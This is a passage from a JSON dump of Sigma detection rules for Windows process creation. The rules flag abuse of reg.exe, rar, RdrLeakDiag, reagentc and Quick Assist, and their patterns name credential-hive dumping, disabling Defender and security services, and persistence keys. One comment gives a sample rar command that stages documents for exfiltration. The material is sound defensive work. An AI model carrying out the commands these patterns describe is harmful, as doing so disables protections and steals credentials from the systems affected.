    "content": "title: QuickAssist Execution\nid: e20b5b14-ce93-4230-88af-981983ef6e74\nstatus: experimental\ndescription: |\n    Detects the execution of Microsoft Quick Assist tool \"QuickAssist.exe\". This utility can be used by attackers to gain remote access.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/\n    - https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/\n    - https://x.com/cyb3rops/status/1862406110365245506\n    - https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-12-19\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\QuickAssist.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Quick Assist in the environment.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rar_compress_data.yml",
    "content": "title: Files Added To An Archive Using Rar.EXE\nid: 6f3e2987-db24-4c78-a860-b4f4095a7095\nstatus: test\ndescription: Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html\nauthor: Timur Zinniatullin, E.M. Anhaus, oscd.community\ndate: 2019-10-21\nmodified: 2023-02-05\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rar.exe'\n        CommandLine|contains: ' a '\n    condition: selection\nfalsepositives:\n    - Highly likely if rar is a default archiver in the monitored environment.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml",
    "content": "title: Rar Usage with Password and Compression Level\nid: faa48cae-6b25-4f00-a094-08947fef582f\nstatus: test\ndescription: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.\nreferences:\n    - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/\n    - https://ss64.com/bash/rar.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: '@ROxPinTeddy'\ndate: 2020-05-12\nmodified: 2022-03-16\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_password:\n        CommandLine|contains: ' -hp'\n    selection_other:\n        CommandLine|contains:\n            - ' -m'\n            - ' a '\n    condition: selection_password and selection_other\nfalsepositives:\n    - Legitimate use of Winrar command line version\n    - Other command line tools, that use these flags\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rar_susp_greedy_compression.yml",
    "content": "title: Suspicious Greedy Compression Using Rar.EXE\nid: afe52666-401e-4a02-b4ff-5d128990b8cb\nstatus: test\ndescription: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes\nreferences:\n    - https://decoded.avast.io/martinchlumecky/png-steganography\nauthor: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-12-15\nmodified: 2024-01-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # Example : rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\\\*.doc c:\\\\*.docx c:\\\\*.xls c:\\\\*.xlsx c:\\\\*.pdf c:\\\\*.ppt c:\\\\*.pptx c:\\\\*.jpg c:\\\\*.txt >nul\n    selection_opt_1:\n        - Image|endswith: '\\rar.exe'\n        - Description: 'Command line RAR'\n    selection_opt_2:\n        CommandLine|contains:\n            - '.exe a '\n            - ' a -m'\n    selection_cli_flags:\n        CommandLine|contains|all:\n            - ' -hp' # password\n            - ' -r ' # recursive\n    selection_cli_folders:\n        CommandLine|contains:\n            - ' ?:\\\\\\*.'\n            - ' ?:\\\\\\\\\\*.'\n            - ' ?:\\$Recycle.bin\\'\n            - ' ?:\\PerfLogs\\'\n            - ' ?:\\Temp'\n            - ' ?:\\Users\\Public\\'\n            - ' ?:\\Windows\\'\n            - ' %public%'\n    condition: 1 of selection_opt_* and all of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rasdial_execution.yml",
    "content": "title: Suspicious RASdial Activity\nid: 6bba49bf-7f8c-47d6-a1bb-6b4dece4640e\nstatus: test\ndescription: Detects suspicious process related to rasdial.exe\nreferences:\n    - https://twitter.com/subTee/status/891298217907830785\nauthor: juju4\ndate: 2019-01-16\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: 'rasdial.exe'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.yml",
    "content": "title: RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class\nid: 4b8f6d3a-9c5e-4f2a-a7d8-6b9c3e5f2a8d\nrelated:\n    - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b\n      type: similar\nstatus: experimental\ndescription: |\n    Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell.\n    In PowerShell one-liner commands, the \"SetAllowTSConnections\" method of the \"Win32_TerminalServiceSetting\" class may be used to enable or disable RDP.\n    In WMIC, the \"rdtoggle\" alias or \"Win32_TerminalServiceSetting\" class may be used for the same purpose.\nreferences:\n    - https://www.trendmicro.com/en_gb/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\n    - https://github.com/HackTricks-wiki/hacktricks/blob/72f20a3fa26775b932bd819f1824c6377802a768/src/windows-hardening/basic-cmd-for-pentesters.md#firewall\n    - https://github.com/Lifailon/RSA/blob/rsa/Sources/RSA-1.4.1.ps1#L1468\nauthor: Daniel Koifman (KoifSec), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-15\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\wmic.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'wmic.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_method:\n        CommandLine|contains:\n            - 'rdtoggle'\n            - 'Win32_TerminalServiceSetting'\n    selection_cli_property:\n        CommandLine|contains: 'SetAllowTSConnections'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate system administrators enabling RDP for remote support\n    - System configuration scripts during deployment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml",
    "content": "title: Process Memory Dump via RdrLeakDiag.EXE\nid: edadb1e5-5919-4e4c-8462-a9e643b02c4b\nrelated:\n    - id: 6355a919-2e97-4285-a673-74645566340d\n      type: obsolete\nstatus: test\ndescription: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory\nreferences:\n    - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\n    - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/\n    - https://twitter.com/0gtweet/status/1299071304805560321?s=21\n    - https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive\nauthor: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-09-24\nmodified: 2024-08-15\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rdrleakdiag.exe'\n        - OriginalFileName: RdrLeakDiag.exe\n    selection_cli_dump:\n        CommandLine|contains|windash:\n            - '/memdmp'\n            - 'fullmemdmp'\n    selection_cli_output_process:\n        CommandLine|contains|windash:\n            - ' /o ' # Output\n            - ' /p ' # Process\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reagentc_disable_windows_recovery_environment.yml",
    "content": "title: Windows Recovery Environment Disabled Via Reagentc\nid: db1c21e4-cd66-4b4e-85ca-590f0780529c\nstatus: experimental\ndescription: |\n    Detects attempts to disable windows recovery environment using Reagentc.\n    ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).\n    It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.\nreferences:\n    - https://www.elastic.co/security-labs/maas-appeal-an-infostealer-rises-from-the-ashes\n    - https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-options?view=windows-11\nauthor: Daniel Koifman (KoifSec), Michael Vilshin\ndate: 2025-07-31\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:   # Example command simulated:  reagentc /disable\n        - Image|endswith: '\\reagentc.exe'\n        - OriginalFileName: 'reagentc.exe'\n    selection_cli:\n        CommandLine|contains|windash: '/disable'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml",
    "content": "title: Potential Persistence Attempt Via Run Keys Using Reg.EXE\nid: de587dce-915e-4218-aac4-835ca6af6f70\nstatus: test\ndescription: Detects suspicious command line reg.exe tool adding key to RUN key in Registry\nreferences:\n    - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/\n    - https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2021-06-28\nmodified: 2025-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - 'reg'\n            - ' add '\n        CommandLine|contains:\n            - 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n    condition: selection\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.\n    - Legitimate administrator sets up autorun keys for legitimate reasons.\n    - Discord\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml",
    "content": "title: Add SafeBoot Keys Via Reg Utility\nid: d7662ff6-9e97-4596-a61d-9839e32dee8d\nrelated:\n    - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de\n      type: similar\nstatus: test\ndescription: Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not\nreferences:\n    - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-02\nmodified: 2024-03-19\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_safeboot:\n        CommandLine|contains: '\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot'\n    selection_flag:\n        CommandLine|contains:\n            - ' copy '\n            - ' add '\n    condition: all of selection*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_bitlocker.yml",
    "content": "title: Suspicious Reg Add BitLocker\nid: 0e0255bf-2548-47b8-9582-c0955c9283f5\nstatus: test\ndescription: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility\nreferences:\n    - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\nauthor: frack113\ndate: 2021-11-15\nmodified: 2022-09-09\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'REG'\n            - 'ADD'\n            - '\\SOFTWARE\\Policies\\Microsoft\\FVE'\n            - '/v'\n            - '/f'\n        CommandLine|contains:\n            - 'EnableBDEWithNoTPM'\n            - 'UseAdvancedStartup'\n            - 'UseTPM'\n            - 'UseTPMKey'\n            - 'UseTPMKeyPIN'\n            - 'RecoveryKeyMessageSource'\n            - 'UseTPMPIN'\n            - 'RecoveryKeyMessage'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml",
    "content": "title: Dropping Of Password Filter DLL\nid: b7966f4a-b333-455b-8370-8ca53c229762\nstatus: test\ndescription: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS\nreferences:\n    - https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/\n    - https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter\nauthor: Sreeman\ndate: 2020-10-29\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1556.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmdline:\n        CommandLine|contains|all:\n            - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa'\n            - 'scecli\\0*'\n            - 'reg add'\n    condition: selection_cmdline\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml",
    "content": "title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE\nid: 48917adc-a28e-4f5d-b729-11e75da8941f\nstatus: test\ndescription: Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.\nreferences:\n    - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n    - https://redcanary.com/threat-detection-report/threats/qbot/\nauthor: frack113\ndate: 2022-02-13\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains:\n            - 'SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths'\n            - 'SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths'\n        CommandLine|contains|all:\n            - 'ADD '\n            - '/t '\n            - 'REG_DWORD '\n            - '/v '\n            - '/d '\n            - '0'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_delete_runmru.yml",
    "content": "title: RunMRU Registry Key Deletion\nid: c11aecef-9c37-45a6-9c07-bc0782f963fd\nrelated:\n    - id: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55\n      type: similar\nstatus: experimental\ndescription: |\n    Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.\n    In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.\n    Adversaries may delete this key to cover their tracks after executing commands.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' del'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml",
    "content": "title: SafeBoot Registry Key Deleted Via Reg.EXE\nid: fc0e89b5-adb0-43c1-b749-c12a10ec37de\nrelated:\n    - id: d7662ff6-9e97-4596-a61d-9839e32dee8d\n      type: similar\nstatus: test\ndescription: Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Tim Shelton\ndate: 2022-08-08\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: 'reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_delete:\n        CommandLine|contains|all:\n            - ' delete '\n            - '\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_delete_services.yml",
    "content": "title: Service Registry Key Deleted Via Reg.EXE\nid: 05b2aa93-1210-42c8-8d9a-2fcc13b284f5\nstatus: test\ndescription: Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services\nreferences:\n    - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: 'reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_delete:\n        CommandLine|contains: ' delete '\n    selection_key:\n        # Add specific services if you would like the rule to be more specific\n        CommandLine|contains: '\\SYSTEM\\CurrentControlSet\\services\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml",
    "content": "title: Potentially Suspicious Desktop Background Change Using Reg.EXE\nid: 8cbc9475-8d05-4e27-9c32-df960716c701\nrelated:\n    - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of \"reg.exe\" to alter registry keys that would replace the user's desktop background.\n    This is a common technique used by malware to change the desktop background to a ransom note or other image.\nreferences:\n    - https://www.attackiq.com/2023/09/20/emulating-rhysida/\n    - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/\n    - https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html\n    - https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI\nauthor: Stephen Lincoln @slincoln-aiq (AttackIQ)\ndate: 2023-12-21\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1112\n    - attack.t1491.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # TODO: Improve this to also focus on variation using PowerShell and other CLI tools\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_flag:\n        CommandLine|contains: 'add'\n    selection_keys:\n        CommandLine|contains:\n            - 'Control Panel\\Desktop'\n            - 'CurrentVersion\\Policies\\ActiveDesktop'\n            - 'CurrentVersion\\Policies\\System'\n    selection_cli_reg_1:\n        CommandLine|contains|all:\n            - '/v NoChangingWallpaper'\n            - '/d 1' # Prevent changing desktop background\n    selection_cli_reg_2:\n        CommandLine|contains|all:\n            - '/v Wallpaper'\n            - '/t REG_SZ'\n    selection_cli_reg_3:\n        CommandLine|contains|all:\n            - '/v WallpaperStyle'\n            - '/d 2' # Stretch\n    condition: all of selection_reg_* and selection_keys and 1 of selection_cli_reg_*\nfalsepositives:\n    - Administrative scripts that change the desktop background to a company logo or other image.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml",
    "content": "title: Direct Autorun Keys Modification\nid: 24357373-078f-44ed-9ac4-6d334a668a11\nstatus: test\ndescription: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2019-10-25\nmodified: 2026-01-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli_add:\n        CommandLine|contains: 'add'     # to avoid intersection with discovery tactic rules\n    selection_cli_keys:\n        CommandLine|contains:           # need to improve this list, there are plenty of ASEP reg keys\n            - '\\software\\Microsoft\\Windows\\CurrentVersion\\Run' # Also covers the strings \"RunOnce\", \"RunOnceEx\", \"RunServices\", \"RunServicesOnce\"\n            - '\\software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n            - '\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n            - '\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n            - '\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows'\n            - '\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.\n    - Legitimate administrator sets up autorun keys for legitimate reasons.\n    - Discord\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_disable_defender_wmi_autologger.yml",
    "content": "title: Disabling Windows Defender WMI Autologger Session via Reg.exe\nid: a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6\nrelated:\n    - id: f37b4bce-49d0-4087-9f5b-58bffda77316\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events.\n    By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events\n    from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique.\nreferences:\n    - https://research.splunk.com/endpoint/76406a0f-f5e0-4167-8e1f-337fdc0f1b0c/\n    - https://docs.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-autologger-session\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/\n    - https://www.binarly.io/blog/design-issues-of-modern-edrs-bypassing-etw-based-solutions\nauthor: Matt Anderson (Huntress)\ndate: 2025-07-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_path:\n        CommandLine|contains:\n            - '\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start'\n            - '\\Control\\WMI\\Autologger\\DefenderAuditLogger\\Start'\n    selection_reg_add:\n        CommandLine|contains|all:\n            - 'add'\n            - '0'\n    filter_main_enable:\n        CommandLine|contains: '0x00000001'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Highly unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml",
    "content": "title: Security Service Disabled Via Reg.EXE\nid: 5e95028c-5229-4214-afae-d653d573d0ec\nstatus: test\ndescription: Detects execution of \"reg.exe\" to disable security services such as Windows Defender.\nreferences:\n    - https://twitter.com/JohnLaTwC/status/1415295021041979392\n    - https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1\n    - https://vms.drweb.fr/virus/?i=24144899\n    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/\nauthor: Florian Roth (Nextron Systems), John Lambert (idea), elhoim\ndate: 2021-07-14\nmodified: 2023-06-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg_add:\n        CommandLine|contains|all:\n            - 'reg'\n            - 'add'\n    selection_cli_reg_start:\n        CommandLine|contains|all:\n            - 'd 4'\n            - 'v Start'\n        CommandLine|contains:\n            - '\\AppIDSvc'\n            - '\\MsMpSvc'\n            - '\\NisSrv'\n            - '\\SecurityHealthService'\n            - '\\Sense'\n            - '\\UsoSvc'\n            - '\\WdBoot'\n            - '\\WdFilter'\n            - '\\WdNisDrv'\n            - '\\WdNisSvc'\n            - '\\WinDefend'\n            - '\\wscsvc'\n            - '\\wuauserv'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml",
    "content": "title: Dumping of Sensitive Hives Via Reg.EXE\nid: fd877b94-9bb5-4191-bb25-d79cbd93c167\nrelated:\n    - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e\n      type: obsolete\n    - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0\n      type: obsolete\nstatus: test\ndescription: Detects the usage of \"reg.exe\" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md\n    - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets\nauthor: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113\ndate: 2019-10-22\nmodified: 2023-12-13\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - car.2013-07-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli_flag:\n        CommandLine|contains:\n            - ' save '\n            - ' export '\n            - ' ˢave '\n            - ' eˣport '\n    selection_cli_hklm:\n        CommandLine|contains:\n            - 'hklm'\n            - 'hk˪m'\n            - 'hkey_local_machine'\n            - 'hkey_˪ocal_machine'\n            - 'hkey_loca˪_machine'\n            - 'hkey_˪oca˪_machine'\n    selection_cli_hive:\n        CommandLine|contains:\n            - '\\system'\n            - '\\sam'\n            - '\\security'\n            - '\\ˢystem'\n            - '\\syˢtem'\n            - '\\ˢyˢtem'\n            - '\\ˢam'\n            - '\\ˢecurity'\n    condition: all of selection_*\nfalsepositives:\n    - Dumping hives for legitimate purpouse i.e. backup or forensic investigation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_enable_windows_recall.yml",
